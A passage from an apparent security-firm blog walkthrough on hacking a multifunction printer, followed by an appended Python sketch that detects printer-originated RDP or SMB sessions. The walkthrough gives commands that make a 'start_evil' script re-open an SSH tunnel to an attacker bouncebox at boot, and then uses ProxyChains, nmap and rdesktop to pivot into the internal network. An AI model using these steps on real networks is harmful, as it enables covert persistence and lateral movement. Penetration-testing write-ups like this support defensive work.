12 days of haxmas: advanced persistent printer

Published at 2015-12-26 17:37:05

OK, the final step is to create a symbolic link in the folder /etc/rc.d/rc3.d/. This is easily done using the following commands:

    cd /etc/rc.d/rc3.d/
    ln -s /etc/rc.d/init.d/start_evil S777_start_evil

Now if the MFP is reset or rebooted, it should re-establish your ssh tunnel connection back out to your bouncebox.

Using ProxyChains and SOCKS Proxy

To be able to use our attack tools from our attacker machine, we use the proxy server software ProxyChains. This allows us to push traffic through the dynamic port forward we previously established. On the attacker machine, we install ProxyChains. To be able to use our dynamic port forward, we edit the configuration file /etc/proxychains.conf and add the following line:

    socks4 127.0.0.1 1080

Figure 15: ProxyChains configuration file

Now that ProxyChains has been configured, we can start using our attacker tools. In the example below we use the port scanner tool nmap to scan a Windows system located in the target network. This is accomplished using the following command:

    proxychains nmap -Pn -sT 192.168.2.72 -p 445,3389

Figure 16: Port scan via our dynamic tunnel

Now that we have identified a Windows system, we connect to the remote desktop service using the command:

    proxychains rdesktop 192.168.2.72

Figure 17: Remote desktop via our dynamic tunnel

As a proof of concept, we log on to the Windows system via remote desktop and run the netstat command to view established connections. Here we can see that the printer (192.168.2.200) has an established connection to the Windows server (192.168.2.72) on the remote desktop port 3389.

Figure 18: Verified connection from printer

Merry haXmas to all the MFP lovers around the world
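
The netstat observation above, a printer holding an established session on port 3389, is also what a defender can alert on. The following detection sketch is an added example, not code from the original post: it parses Windows netstat -an output and flags sessions that an inventoried printer opened to the SMB or RDP ports scanned in the article. The sample output, the 192.168.2.15 workstation and the printer inventory are constructed assumptions.

```python
import ipaddress

# Constructed sample of Windows `netstat -an` output from the server in the
# article (192.168.2.72); the admin workstation 192.168.2.15 is an assumption.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    192.168.2.72:3389      192.168.2.200:49212    ESTABLISHED
  TCP    192.168.2.72:3389      192.168.2.15:50123     ESTABLISHED
  TCP    192.168.2.72:49701     192.168.2.200:9100     ESTABLISHED
  TCP    192.168.2.72:445       192.168.2.200:49377    TIME_WAIT
"""

# Assumed inventory: addresses of printers/MFPs, which should never be clients
# of interactive or file-sharing services.
PRINTER_NETS = [ipaddress.ip_network("192.168.2.200/32")]
SENSITIVE_PORTS = {445: "SMB", 3389: "RDP"}  # the ports scanned in the article


def split_endpoint(endpoint):
    """Split 'ip:port' (or '[v6]:port') into (ip_address, port)."""
    host, _, port = endpoint.rpartition(":")
    return ipaddress.ip_address(host.strip("[]")), int(port)


def printer_initiated(netstat_text, states=("ESTABLISHED",)):
    """Return (printer_ip, service, local_port) for sessions a printer opened to us."""
    hits = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) != 4 or fields[0] != "TCP" or fields[3] not in states:
            continue
        try:
            _, local_port = split_endpoint(fields[1])
            remote_ip, _ = split_endpoint(fields[2])
        except ValueError:
            continue  # wildcard or malformed address column
        if local_port in SENSITIVE_PORTS and any(remote_ip in n for n in PRINTER_NETS):
            hits.append((str(remote_ip), SENSITIVE_PORTS[local_port], local_port))
    return hits


if __name__ == "__main__":
    for ip, service, port in printer_initiated(SAMPLE_NETSTAT):
        print(f"ALERT: printer {ip} has a {service} session to local port {port}")
```

The server's own outbound print job to the printer's port 9100 is not flagged, because only sessions arriving on the local SMB or RDP port count; passing states=("ESTABLISHED", "TIME_WAIT") also catches sessions that have just closed.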

Source: rapid7.com